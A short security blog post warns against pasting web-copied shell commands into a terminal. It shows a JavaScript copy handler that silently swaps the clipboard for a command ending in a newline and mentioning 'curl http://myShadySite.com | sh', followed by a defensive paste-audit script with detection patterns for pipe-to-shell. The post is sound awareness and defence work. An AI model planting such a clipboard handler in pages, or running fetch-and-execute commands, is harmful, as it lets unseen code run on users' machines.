Don't Copy Paste into terminal

Other Oct 24, 2020

When you see a shell command on the Internet, do not copy it into your terminal.

Modern JavaScript Clipboard APIs let a website intercept the copy event and replace what lands on the clipboard, regardless of the text you actually selected.

Here is an example of how simple this attack can be.

$ echo "looks safe to me!"

Note that you don't even have to press ENTER in your terminal after pasting for the exploit to happen. The payload conveniently contains a trailing newline that does that for you, so the command runs before you get a chance to read it.

Here is the JavaScript that is performing the exploit.

// Runs whenever the user copies from the element with id "copyme".
document.getElementById('copyme').addEventListener('copy', function(e) {
    // Replace the clipboard contents with the attacker's command.
    // The trailing "\n" makes the shell execute it as soon as it is pasted.
    e.clipboardData.setData('text/plain',
        'echo "this could have been [curl http://myShadySite.com | sh]"\n'
    );
    // Stop the browser from putting the visibly selected text on the clipboard.
    e.preventDefault();
});
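A check from the other side, as an added example that is not from the original post: it audits text taken from the clipboard before it reaches a shell and flags the tricks shown above (the trailing newline, the pipe into a shell, and characters that do not render). The function names and the two sample strings are constructed for the example.

```javascript
// Added example: a "paste gate" for clipboard text bound for a shell.
// Not part of the original post; names and samples are constructed.

// Fetch-and-execute pattern such as `curl ... | sh` or `wget -O- ... | sudo bash`.
const PIPE_TO_SHELL = /\|\s*(sudo\s+)?(sh|bash|zsh|dash)\b/;

// Control characters (except tab/newline), zero-width and BOM code points,
// which can hide part of a command on a web page or in a terminal.
const HIDDEN_CHARS = /[\x00-\x08\x0b-\x1f\x7f\u200b-\u200f\u2028\u2029\ufeff]/;

// Returns a list of findings; an empty list means nothing suspicious was seen.
function auditClipboardText(text) {
  const findings = [];
  // A trailing newline makes the shell run the line on paste, with no review.
  if (/\n$/.test(text)) findings.push('trailing-newline');
  // Several lines in one paste: earlier lines run while you read the last one.
  if (text.trim().split('\n').length > 1) findings.push('multi-line');
  if (PIPE_TO_SHELL.test(text)) findings.push('pipe-to-shell');
  if (HIDDEN_CHARS.test(text)) findings.push('hidden-chars');
  return findings;
}

function isSafeToPaste(text) {
  return auditClipboardText(text).length === 0;
}

// Constructed samples: what the page displayed vs what the copy handler wrote.
const VISIBLE_TEXT = 'echo "looks safe to me!"';
const COPIED_TEXT = 'echo "this could have been [curl http://myShadySite.com | sh]"\n';

// In a browser (e.g. a web-based terminal), gate the paste event on the audit.
if (typeof document !== 'undefined') {
  document.addEventListener('paste', function (e) {
    const text = e.clipboardData.getData('text/plain');
    const findings = auditClipboardText(text);
    if (findings.length > 0) {
      e.preventDefault();
      console.warn('Paste blocked, clipboard text flagged:', findings.join(', '));
    }
  });
}
```

Locally, terminals with bracketed paste (readline's `enable-bracketed-paste`, on by default in recent bash and zsh) give the same protection against the trailing newline, since a pasted block is inserted as text rather than executed.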

Sources:
https://briantracy.xyz/writing/copy-paste-shell.html

Cover Image Credit: https://www.pexels.com/@soumil-kumar-4325
